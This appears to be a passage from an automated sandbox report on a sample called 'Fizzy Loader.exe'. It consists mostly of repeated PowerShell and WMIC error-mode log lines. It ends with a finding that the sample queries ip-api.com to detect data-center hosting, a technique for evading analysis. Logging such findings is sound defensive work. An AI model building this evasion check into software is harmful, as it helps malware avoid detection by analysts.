                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeMemory allocated: 172AF0E0000 memory reserve | memory write watchJump to behavior
